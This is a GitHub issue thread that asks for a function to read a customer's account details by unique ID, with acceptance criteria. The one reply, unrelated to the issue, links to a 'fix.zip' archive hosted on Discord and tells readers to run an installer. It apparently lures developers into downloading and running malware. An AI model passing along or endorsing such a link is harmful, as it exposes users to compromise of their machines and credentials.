### ISSUE TITLE
Read an account from the service

### ISSUE THREAD

**Issue by deannie2003** [deannie2003/github-final-project#2]
**As a** developer  
**I need** a function to read customer account information  
**So that** I can view details of a specific account  

### Details and Assumptions
* The function should retrieve account details using a unique identifier.

### Acceptance Criteria     
```gherkin
Given a unique customer ID
When I call the read function
Then I should get the customer's account details

**Comment by zawa999** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer
